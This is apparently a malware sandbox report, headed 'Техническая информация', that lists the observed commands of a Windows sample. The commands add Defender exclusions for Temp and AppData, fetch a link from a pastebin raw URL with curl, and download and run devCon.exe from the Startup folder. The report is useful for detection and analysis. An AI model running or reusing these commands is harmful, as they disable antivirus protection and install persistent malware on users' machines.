Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%APPDATA%"
- '%WINDIR%\syswow64\taskkill.exe' /f /IM devCon.exe
- DNS ASK pa###bin.com
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%temp%"
- '%WINDIR%\syswow64\cmd.exe' /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%appdata%"
- '%WINDIR%\syswow64\cmd.exe' /c cd /D %appdata%>nul && IF exist TS4Client (@echo off) ELSE mkdir TS4Client>nul
- '%WINDIR%\syswow64\cmd.exe' /c cd /D "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" & FOR /F "tokens=*" %a in ('curl -s https://pastebin.com/raw/uSMzw21N')do SET "var=%a">nul 2>&1 && call curl %var% -o devCon.e...
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/uSMzw21N
- '%WINDIR%\syswow64\curl.exe' -s https://pastebin.com/raw/uSMzw21N
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /IM devCon.exe
- '%WINDIR%\syswow64\cmd.exe' /c cd /D "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" & devCon.exe>nul